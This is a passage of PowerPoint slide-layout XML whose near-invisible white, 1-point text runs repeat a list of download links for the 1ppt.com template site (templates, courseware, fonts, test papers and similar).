              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout229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29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29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29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3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30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30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30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30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30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30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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout230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30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30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30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3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31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31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31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31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31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31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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout231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31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31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31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3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32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32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32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32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32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32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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
